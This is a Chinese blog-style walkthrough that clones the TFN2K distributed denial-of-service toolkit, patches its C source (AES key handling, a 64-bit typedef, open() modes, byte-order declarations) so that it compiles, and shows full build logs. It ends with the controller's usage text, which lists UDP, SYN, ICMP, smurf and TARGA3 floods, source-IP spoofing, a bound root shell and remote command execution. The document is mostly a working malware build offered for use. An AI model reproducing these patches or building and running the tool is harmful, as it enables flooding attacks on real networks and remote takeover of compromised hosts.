一、获取tfn2k源码:
root@ubuntu:/home/zhl/netsafe/tfn2k# git clone https://github.com/poornigga/tfn2k.git Cloning into 'tfn2k'... remote: Counting objects: 94, done. remote: Total 94 (delta 0), reused 0 (delta 0), pack-reused 94 Unpacking objects: 100% (94/94), done. Checking connectivity... done.
二、源码修改点
参照《linux使用tfn2k攻击之修改tfn2k错误使之正常运行》修改了如下问题点:
错误1 aes.c文件 aes_setkey函数中,使用key变量前,先对其置零; u4byte keylen = strlen (password) * 8; u4byte key[strlen (password) / 4]; 添加一行代码: memset(key, 0, sizeof(key)); memcpy (key, password, strlen (password)); 错误2 aes.h文件 在64位的系统下,gcc会认为unsigned long是8个字节,而tfn2k把它当4个字节使用,从而导致在aes_setkey函数中误用。 最终导致的问题就是,在使用./tfn攻击时时,输入正确密码也会一直提示“Sorry, passwords do not match.”,tfn2k不兼容64位。 将typedef unsigned long u4byte; /* a 32 bit unsigned integer type */ 中的long改为int,变成这样: typedef unsigned int u4byte; /* a 32 bit unsigned integer type */ 错误3 disc.c文件 编译时,会提示open with O_CREAT in second argument needs 3 arguments时,open加上第三个参数0777; close (open ("agreed", O_WRONLY | O_CREAT | O_TRUNC)); open函数加上第三个参数0777,变成这样: close (open ("agreed", O_WRONLY | O_CREAT | O_TRUNC, 0777)); 错误4 mkpass.c文件 和错误3一样,给open函数加上第三个参数0777 fd = open ("pass.c", O_WRONLY | O_TRUNC | O_CREAT); 变成这样: fd = open ("pass.c", O_WRONLY | O_TRUNC | O_CREAT, 0777);
三. tfn2k编译make
make[1]: Entering directory '/home/zhl/netsafe/tfn2k/tfn2k/src' gcc -Wall -g disc.c -o disc disc.c: In function ‘main’: disc.c:24:5: warning: implicit declaration of function ‘exit’ [-Wimplicit-function-declaration] exit (0); ^ disc.c:24:5: warning: incompatible implicit declaration of built-in function ‘exit’ disc.c:24:5: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ ./disc This program is distributed for educational purposes and without any explicit or implicit warranty; in no event shall the author or contributors be liable for any direct, indirect or incidental damages arising in any way out of the use of this software. I hereby certify that I will not hold the author liable for any wanted or unwanted effects caused by this program and that I will give the author full credit and exclusively use this program for educational purposes. Do you agree to this disclaimer [y/n]? y gcc -Wall -g mkpass.c -o mkpass mkpass.c: In function ‘main’: mkpass.c:104:11: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘size_t {aka long unsigned int}’ [-Wformat=] printf ("compiling server with %d byte password... ", strlen (c)); ^ ./mkpass server key [8 - 32 chars]: //注:这里输入12345678,攻击的时候需要输入密码 compiling server with 11 byte password... gcc -Wall -g -c -o pass.o pass.c gcc -Wall -g -c -o aes.o aes.c aes.c: In function ‘aes_setkey’: aes.c:10:19: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration] u4byte keylen = strlen (password) * 8; ^ aes.c:10:19: warning: incompatible implicit declaration of built-in function ‘strlen’ aes.c:10:19: note: include ‘<string.h>’ or provide a declaration of ‘strlen’ aes.c:12:3: warning: implicit declaration of function ‘memset’ [-Wimplicit-function-declaration] memset(key, 0, sizeof(key)); ^ aes.c:12:3: warning: incompatible implicit declaration of built-in function ‘memset’ aes.c:12:3: note: include ‘<string.h>’ or provide a declaration of ‘memset’ aes.c:13:3: warning: implicit declaration of function ‘memcpy’ [-Wimplicit-function-declaration] memcpy (key, password, strlen (password)); ^ aes.c:13:3: warning: incompatible implicit declaration of built-in function ‘memcpy’ aes.c:13:3: note: include ‘<string.h>’ or provide a declaration of ‘memcpy’ aes.c: In function ‘encode’: aes.c:27:7: warning: incompatible implicit declaration of built-in function ‘memcpy’ memcpy (in_blk, inbuf + i, 16); ^ aes.c:27:7: note: include ‘<string.h>’ or provide a declaration of ‘memcpy’ aes.c: In function ‘decode’: aes.c:45:7: warning: incompatible implicit declaration of built-in function ‘memcpy’ memcpy (in_blk, inbuf + i, 16); ^ aes.c:45:7: note: include ‘<string.h>’ or provide a declaration of ‘memcpy’ gcc -Wall -g -c -o base64.o base64.c gcc -Wall -g -c -o cast.o cast.c gcc -Wall -g -c -o flood.o flood.c In file included from flood.c:14:0: tribe.h:39:6: warning: conflicting types for built-in function ‘bzero’ void bzero (void *s, int n); ^ In file included from tribe.h:44:0, from flood.c:14: ip.h:50:19: error: conflicting types for ‘htonl’ unsigned long int htonl (unsigned long int hostlong); ^ In file included from /usr/include/netdb.h:27:0, from tribe.h:25, from flood.c:14: /usr/include/netinet/in.h:379:17: note: previous declaration of ‘htonl’ was here extern uint32_t htonl (uint32_t __hostlong) ^ In file included from tribe.h:44:0, from flood.c:14: ip.h:52:19: error: conflicting types for ‘ntohl’ unsigned long int ntohl (unsigned long int netlong); ^ In file included from /usr/include/netdb.h:27:0, from tribe.h:25, from flood.c:14: /usr/include/netinet/in.h:376:17: note: previous declaration of ‘ntohl’ was here extern uint32_t ntohl (uint32_t __netlong) __THROW __attribute__ ((__const__)); ^ In file included from tribe.h:46:0, from flood.c:14: config.h:23:18: warning: extra tokens at end of #undef directive #undef ATTACKLOG "attack.log" /* keep server side logs of attacked victims */ ^ <builtin>: recipe for target 'flood.o' failed make[1]: *** [flood.o] Error 1 make[1]: Leaving directory '/home/zhl/netsafe/tfn2k/tfn2k/src' Makefile:5: recipe for target 'all' failed make: *** [all] Error 2 root@ubuntu:/home/zhl/netsafe/tfn2k/tfn2k#
日志信息中打印出如下信息:
In file included from tribe.h:44:0, from flood.c:14: ip.h:52:19: error: conflicting types for ‘ntohl’ unsigned long int ntohl (unsigned long int netlong); ^ In file included from /usr/include/netdb.h:27:0, from tribe.h:25, from flood.c:14: /usr/include/netinet/in.h:376:17: note: previous declaration of ‘ntohl’ was here extern uint32_t ntohl (uint32_t __netlong) __THROW __attribute__ ((__const__)); ^ In file included from tribe.h:46:0, from flood.c:14: config.h:23:18: warning: extra tokens at end of #undef directive #undef ATTACKLOG "attack.log" /* keep server side logs of attacked victims */ ^ <builtin>: recipe for target 'flood.o' failed make[1]: *** [flood.o] Error 1
搜索这两个函数,有如下解释:
ntohs =net to host short int 16位 htons=host to net short int 16位 ntohl =net to host long int 32位 htonl=host to net long int 32位 网络字节顺序NBO(Network Byte Order) 按从高到低的顺序存储,在网络上使用同一的网络字节顺序,可避免兼容性问题; 主机字节顺序HBO(Host Byte Order) 不同的机器HBO不相同,与CPU的设计有关,数据的顺序是由CPU决定的,而与操作系统无关; 如Intel x86结构下,short型数0x1234表示为34 12,int型数0x12345678表示为78 56 34 12; 如IBM power PC结构下,short型数0x1234表示为 12 34,int型数0x12345678表示为 12 34 56 78. 由于这个原因,不同体系结构的机器之间不能直接通信,所以要转换成一种约定的顺序,也就是网络字节顺序,其实就是如同power pc那样的顺序。在PC开发中有ntohl和htonl函数可以用来进行网络字节和主机字节的转换 linx系统下,htonl() htons() ntohl() ntohs()的头文件及函数定义如下: #include <arpa/inet.h> uint32_t htonl(uint32_t hostlong); uint16_t htons(uint16_t hostshort); uint32_t ntohl(uint32_t netlong); uint16_t ntohs(uint16_t netshort);
进行了如下修改:
#if __BYTE_ORDER == __BIG_ENDIAN #define ntohl(x) (x) #define ntohs(x) (x) #define htonl(x) (x) #define htons(x) (x) /*#else unsigned long int htonl (unsigned long int hostlong); unsigned short int htons (unsigned short int hostshort); unsigned long int ntohl (unsigned long int netlong); unsigned short int ntohs (unsigned short int netshort);*/ #endif
再次执行make,有warning但执行通过:
root@ubuntu:/home/zhl/netsafe/tfn2k/tfn2k# make cd src && make make[1]: Entering directory '/home/zhl/netsafe/tfn2k/tfn2k/src' gcc -Wall -g -c -o flood.o flood.c In file included from flood.c:14:0: tribe.h:39:6: warning: conflicting types for built-in function ‘bzero’ void bzero (void *s, int n); ^ In file included from tribe.h:46:0, from flood.c:14: config.h:23:18: warning: extra tokens at end of #undef directive #undef ATTACKLOG "attack.log" /* keep server side logs of attacked victims */ ^ gcc -Wall -g -c -o ip.o ip.c In file included from ip.c:14:0: tribe.h:39:6: warning: conflicting types for built-in function ‘bzero’ void bzero (void *s, int n); ^ In file included from tribe.h:46:0, from ip.c:14: config.h:23:18: warning: extra tokens at end of #undef directive #undef ATTACKLOG "attack.log" /* keep server side logs of attacked victims */ ^ ip.c: In function ‘resolve’: ip.c:24:9: warning: implicit declaration of function ‘memcpy’ [-Wimplicit-function-declaration] memcpy ((caddr_t) & tmp.add, he->h_addr, he->h_length); ^ ip.c:24:9: warning: incompatible implicit declaration of built-in function ‘memcpy’ ip.c:24:9: note: include ‘<string.h>’ or provide a declaration of ‘memcpy’ gcc -Wall -g -c -o process.o process.c In file included from process.c:14:0: tribe.h:39:6: warning: conflicting types for built-in function ‘bzero’ void bzero (void *s, int n); ^ In file included from tribe.h:46:0, from process.c:14: config.h:23:18: warning: extra tokens at end of #undef directive #undef ATTACKLOG "attack.log" /* keep server side logs of attacked victims */ ^ process.c: In function ‘shellsex’: process.c:39:9: warning: implicit declaration of function ‘exit’ [-Wimplicit-function-declaration] exit (0); ^ process.c:39:9: warning: incompatible implicit declaration of built-in function ‘exit’ process.c:39:9: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ process.c:41:9: warning: incompatible implicit declaration of built-in function ‘exit’ exit (0); ^ process.c:41:9: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ process.c:45:52: warning: pointer targets in passing argument 3 of ‘accept’ differ in signedness [-Wpointer-sign] s2 = accept (s1, (struct sockaddr *) &c_a, &s3); ^ In file included from tribe.h:24:0, from process.c:14: /usr/include/x86_64-linux-gnu/sys/socket.h:243:12: note: expected ‘socklen_t * restrict {aka unsigned int * restrict}’ but argument is of type ‘int *’ extern int accept (int __fd, __SOCKADDR_ARG __addr, ^ process.c: In function ‘commence_udp’: process.c:90:17: warning: incompatible implicit declaration of built-in function ‘exit’ exit (0); ^ process.c:90:17: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ process.c: In function ‘commence_syn’: process.c:126:17: warning: incompatible implicit declaration of built-in function ‘exit’ exit (0); ^ process.c:126:17: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ process.c: In function ‘commence_icmp’: process.c:161:17: warning: incompatible implicit declaration of built-in function ‘exit’ exit (0); ^ process.c:161:17: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ process.c: In function ‘commence_mix’: process.c:196:17: warning: incompatible implicit declaration of built-in function ‘exit’ exit (0); ^ process.c:196:17: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ process.c: In function ‘commence_smurf’: process.c:243:17: warning: incompatible implicit declaration of built-in function ‘exit’ exit (0); ^ process.c:243:17: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ process.c: In function ‘commence_targa3’: process.c:278:17: warning: incompatible implicit declaration of built-in function ‘exit’ exit (0); ^ process.c:278:17: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ gcc -Wall -g -c -o tribe.o tribe.c In file included from tribe.c:14:0: tribe.h:39:6: warning: conflicting types for built-in function ‘bzero’ void bzero (void *s, int n); ^ In file included from tribe.h:46:0, from tribe.c:14: config.h:23:18: warning: extra tokens at end of #undef directive #undef ATTACKLOG "attack.log" /* keep server side logs of attacked victims */ ^ tribe.c: In function ‘trimbuf’: tribe.c:39:21: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration] for (i = 0; i < strlen (buf); i++) ^ tribe.c:39:21: warning: incompatible implicit declaration of built-in function ‘strlen’ tribe.c:39:21: note: include ‘<string.h>’ or provide a declaration of ‘strlen’ tribe.c: In function ‘tfntransmit’: tribe.c:108:32: warning: incompatible implicit declaration of built-in function ‘strlen’ encode64 (data, p, strlen (data)); ^ tribe.c:108:32: note: include ‘<string.h>’ or provide a declaration of ‘strlen’ tribe.c:108:23: warning: pointer targets in passing argument 1 of ‘encode64’ differ in signedness [-Wpointer-sign] encode64 (data, p, strlen (data)); ^ In file included from tribe.h:45:0, from tribe.c:14: aes.h:37:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ tribe.c:108:29: warning: pointer targets in passing argument 2 of ‘encode64’ differ in signedness [-Wpointer-sign] encode64 (data, p, strlen (data)); ^ In file included from tribe.h:45:0, from tribe.c:14: aes.h:37:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ tribe.c:122:23: warning: pointer targets in passing argument 1 of ‘encode64’ differ in signedness [-Wpointer-sign] encode64 (data, p, strlen (data)); ^ In file included from tribe.h:45:0, from tribe.c:14: aes.h:37:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ tribe.c:122:29: warning: pointer targets in passing argument 2 of ‘encode64’ differ in signedness [-Wpointer-sign] encode64 (data, p, strlen (data)); ^ In file included from tribe.h:45:0, from tribe.c:14: aes.h:37:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ tribe.c:143:23: warning: pointer targets in passing argument 1 of ‘encode64’ differ in signedness [-Wpointer-sign] encode64 (data, p, strlen (data)); ^ In file included from tribe.h:45:0, from tribe.c:14: aes.h:37:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ tribe.c:143:29: warning: pointer targets in passing argument 2 of ‘encode64’ differ in signedness [-Wpointer-sign] encode64 (data, p, strlen (data)); ^ In file included from tribe.h:45:0, from tribe.c:14: aes.h:37:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ tribe.c:150:13: warning: implicit declaration of function ‘exit’ [-Wimplicit-function-declaration] exit (0); ^ tribe.c:150:13: warning: incompatible implicit declaration of built-in function ‘exit’ tribe.c:150:13: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ gcc -Wall -g -c -o td.o td.c In file included from td.c:14:0: tribe.h:39:6: warning: conflicting types for built-in function ‘bzero’ void bzero (void *s, int n); ^ In file included from tribe.h:46:0, from td.c:14: config.h:23:18: warning: extra tokens at end of #undef directive #undef ATTACKLOG "attack.log" /* keep server side logs of attacked victims */ ^ td.c: In function ‘main’: td.c:35:9: warning: implicit declaration of function ‘exit’ [-Wimplicit-function-declaration] exit (-1); ^ td.c:35:9: warning: incompatible implicit declaration of built-in function ‘exit’ td.c:35:9: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ td.c:37:25: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration] memset (argv[0], 0, strlen (argv[0])); ^ td.c:37:25: warning: incompatible implicit declaration of built-in function ‘strlen’ td.c:37:25: note: include ‘<string.h>’ or provide a declaration of ‘strlen’ td.c:38:5: warning: implicit declaration of function ‘strcpy’ [-Wimplicit-function-declaration] strcpy (argv[0], HIDEME); ^ td.c:38:5: warning: incompatible implicit declaration of built-in function ‘strcpy’ td.c:38:5: note: include ‘<string.h>’ or provide a declaration of ‘strcpy’ td.c:44:9: warning: incompatible implicit declaration of built-in function ‘exit’ exit (0); ^ td.c:44:9: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ td.c:82:23: warning: pointer targets in passing argument 1 of ‘decode64’ differ in signedness [-Wpointer-sign] decode64 (p, clear, i); ^ In file included from tribe.h:45:0, from td.c:14: aes.h:38:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *decode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ td.c:82:26: warning: pointer targets in passing argument 2 of ‘decode64’ differ in signedness [-Wpointer-sign] decode64 (p, clear, i); ^ In file included from tribe.h:45:0, from td.c:14: aes.h:38:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *decode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ td.c:99:23: warning: pointer targets in passing argument 1 of ‘decode64’ differ in signedness [-Wpointer-sign] decode64 (p, clear, i); ^ In file included from tribe.h:45:0, from td.c:14: aes.h:38:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *decode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ td.c:99:26: warning: pointer targets in passing argument 2 of ‘decode64’ differ in signedness [-Wpointer-sign] decode64 (p, clear, i); ^ In file included from tribe.h:45:0, from td.c:14: aes.h:38:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *decode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ td.c:116:23: warning: pointer targets in passing argument 1 of ‘decode64’ differ in signedness [-Wpointer-sign] decode64 (p, clear, i); ^ In file included from tribe.h:45:0, from td.c:14: aes.h:38:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *decode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ td.c:116:26: warning: pointer targets in passing argument 2 of ‘decode64’ differ in signedness [-Wpointer-sign] decode64 (p, clear, i); ^ In file included from tribe.h:45:0, from td.c:14: aes.h:38:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *decode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ td.c: In function ‘tribe_cmd’: td.c:143:13: warning: incompatible implicit declaration of built-in function ‘strcpy’ strcpy (argp[0], HIDEKIDS); ^ td.c:143:13: note: include ‘<string.h>’ or provide a declaration of ‘strcpy’ gcc -Wall -g pass.o aes.o base64.o cast.o flood.o ip.o process.o tribe.o td.o -o td strip td gcc -Wall -g -c -o tfn.o tfn.c In file included from tfn.c:14:0: tribe.h:39:6: warning: conflicting types for built-in function ‘bzero’ void bzero (void *s, int n); ^ In file included from tribe.h:46:0, from tfn.c:14: config.h:23:18: warning: extra tokens at end of #undef directive #undef ATTACKLOG "attack.log" /* keep server side logs of attacked victims */ ^ tfn.c: In function ‘main’: tfn.c:122:9: warning: implicit declaration of function ‘strcpy’ [-Wimplicit-function-declaration] strcpy (port, "0"); ^ tfn.c:122:9: warning: incompatible implicit declaration of built-in function ‘strcpy’ tfn.c:122:9: note: include ‘<string.h>’ or provide a declaration of ‘strcpy’ tfn.c:139:17: warning: incompatible implicit declaration of built-in function ‘strcpy’ strcpy (target, "0"); ^ tfn.c:139:17: note: include ‘<string.h>’ or provide a declaration of ‘strcpy’ tfn.c: In function ‘passchk’: tfn.c:232:28: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration] encode64 (test1, enc1, strlen (test1)); ^ tfn.c:232:28: warning: incompatible implicit declaration of built-in function ‘strlen’ tfn.c:232:28: note: include ‘<string.h>’ or provide a declaration of ‘strlen’ tfn.c:232:15: warning: pointer targets in passing argument 1 of ‘encode64’ differ in signedness [-Wpointer-sign] encode64 (test1, enc1, strlen (test1)); ^ In file included from tribe.h:45:0, from tfn.c:14: aes.h:37:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ tfn.c:232:22: warning: pointer targets in passing argument 2 of ‘encode64’ differ in signedness [-Wpointer-sign] encode64 (test1, enc1, strlen (test1)); ^ In file included from tribe.h:45:0, from tfn.c:14: aes.h:37:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ tfn.c:235:15: warning: pointer targets in passing argument 1 of ‘encode64’ differ in signedness [-Wpointer-sign] encode64 (test2, enc2, strlen (test2)); ^ In file included from tribe.h:45:0, from tfn.c:14: aes.h:37:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ tfn.c:235:22: warning: pointer targets in passing argument 2 of ‘encode64’ differ in signedness [-Wpointer-sign] encode64 (test2, enc2, strlen (test2)); ^ In file included from tribe.h:45:0, from tfn.c:14: aes.h:37:9: note: expected ‘u1byte * {aka unsigned char *}’ but argument is of type ‘char *’ u1byte *encode64 (u1byte * inbuf, u1byte * outbuf, int len); ^ tfn.c:237:9: warning: implicit declaration of function ‘strcmp’ [-Wimplicit-function-declaration] if (strcmp (enc1, enc2)) { ^ tfn.c:240:9: warning: implicit declaration of function ‘exit’ [-Wimplicit-function-declaration] exit (0); ^ tfn.c:240:9: warning: incompatible implicit declaration of built-in function ‘exit’ tfn.c:240:9: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ tfn.c: In function ‘tfn_sendto’: tfn.c:252:13: warning: incompatible implicit declaration of built-in function ‘strcpy’ strcpy (lport, port); ^ tfn.c:252:13: note: include ‘<string.h>’ or provide a declaration of ‘strcpy’ tfn.c:256:9: warning: incompatible implicit declaration of built-in function ‘strcpy’ strcpy (ltarget, target); ^ tfn.c:256:9: note: include ‘<string.h>’ or provide a declaration of ‘strcpy’ tfn.c: In function ‘usage’: tfn.c:295:5: warning: incompatible implicit declaration of built-in function ‘exit’ exit (0); ^ tfn.c:295:5: note: include ‘<stdlib.h>’ or provide a declaration of ‘exit’ gcc -Wall -g pass.o aes.o base64.o cast.o ip.o tribe.o tfn.o -o tfn strip tfn make[1]: Leaving directory '/home/zhl/netsafe/tfn2k/tfn2k/src' cp src/td src/tfn . root@ubuntu:/home/zhl/netsafe/
3. 编译后会出现两个新的执行文件td 和 tfn,其中td是守护进程,也是客户机的使用进程。而tfn是服务器控制进程。
root@ubuntu:/home/zhl/netsafe/tfn2k/tfn2k# ll total 136 drwxr-xr-x 4 root root 4096 Sep 24 20:04 ./ drwxrwxr-x 3 zhl zhl 4096 Sep 24 19:14 ../ drwxr-xr-x 8 root root 4096 Sep 24 19:14 .git/ -rw-r--r-- 1 root root 23 Sep 24 19:14 .gitignore -rw-r--r-- 1 root root 6061 Sep 24 19:14 HOWTO.md -rw-r--r-- 1 root root 112 Sep 24 19:14 Makefile -rw-r--r-- 1 root root 11616 Sep 24 19:14 README drwxr-xr-x 2 root root 4096 Sep 24 20:04 src/ -rwxr-xr-x 1 root root 47968 Sep 24 20:04 td* -rwxr-xr-x 1 root root 43800 Sep 24 20:04 tfn* root@ubuntu:/home/zhl/netsafe/tfn2k/tfn2k# ./tfn usage: ./tfn <options> [-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP. Uses a random protocol as default [-D n] Send out n bogus requests for each real one to decoy targets [-S host/ip] Specify your source IP. Randomly spoofed by default, you need to use your real IP if you are behind spoof-filtering routers [-f hostlist] Filename containing a list of hosts with TFN servers to contact [-h hostname] To contact only a single host running a TFN server [-i target string] Contains options/targets separated by '@', see below [-p port] A TCP destination port can be specified for SYN floods <-c command ID> 0 - Halt all current floods on server(s) immediately 1 - Change IP antispoof-level (evade rfc2267 filtering) usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed) 2 - Change Packet size, usage: -i <packet size in bytes> 3 - Bind root shell to a port, usage: -i <remote port> 4 - UDP flood, usage: -i victim@victim2@victim3@... 5 - TCP/SYN flood, usage: -i victim@... [-p destination port] 6 - ICMP/PING flood, usage: -i victim@... 7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@... 8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@... 9 - TARGA3 flood (IP stack penetration), usage: -i victim@... 10 - Blindly execute remote shell command, usage -i command
参考链接:
Linux操作系统实现DDOS攻击的方法:http://soft.yesky.com/securityw/aqff/352/7566352all.shtml#p7566352
编译过程的工作原理:http://www.ruanyifeng.com/blog/2014/11/compiler.html
大端和小端(Big endian and Little endian):http://www.cnblogs.com/luxiaoxun/archive/2012/09/05/2671697.html